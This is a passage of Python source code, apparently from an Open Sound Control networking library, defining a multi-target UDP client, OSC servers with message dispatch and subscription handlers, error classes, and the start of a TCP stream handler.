"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in (str,):
(_, filters) = parseFilterStr(filters)
elif type(filters) != dict:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
elif (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in (str,):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in (str,):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
